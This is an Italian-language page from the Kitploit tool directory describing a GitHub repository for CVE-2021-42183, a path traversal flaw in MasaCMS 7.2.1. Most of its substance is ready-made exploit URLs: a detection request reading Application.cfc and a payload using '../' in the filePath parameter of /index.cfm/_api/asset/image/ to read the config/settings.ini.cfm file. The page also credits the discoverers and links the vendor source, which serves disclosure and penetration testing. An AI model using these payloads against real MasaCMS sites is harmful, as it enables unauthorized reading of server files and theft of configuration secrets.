Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2021-42183 — Exploit di path traversal per MasaCMS 7.2.1 con script di rilevamento e payload di estrazione di file di configurazione per penetration testing. | Kitploit
Strumenti/GitHubGitHub/0xraw/cve-2021-42183
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration Testing
GitHub0xraw/cve-2021-42183

CVE-2021-42183

Exploit di path traversal per MasaCMS 7.2.1 con script di rilevamento e payload di estrazione di file di configurazione per penetration testing.

Vedi Repository
2 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2021-42183

MasaCMS 7.2.1 è affetto da una vulnerabilità di path traversal in /index.cfm/_api/asset/image/.

Rilevamento

root@kitploit:~
If this file is readable it means the vulnerablilty exists.
https://example.com/index.cfm/_api/asset/image/?filePath=/Application.cfc

Exploit

root@kitploit:~
https://example.com/index.cfm/_api/asset/image/?filePath=/../<Path>
- Read The Config File
https://example.com/index.cfm/_api/asset/image/?filePath=/../config/settings.ini.cfm 

Testato su

MasaCMS 7.2.1

Fornitore

http://www.masacms.com

https://github.com/MasaCMS/MasaCMS https://github.com/MasaCMS/MasaCMS/blob/01e0636db0ea4c132906724e1b0772c86e263ada/core/mura/content/file/fileManager.cfc#L368

Scoperto da:

Rawi e BassamAssiri.

Scarica lo strumento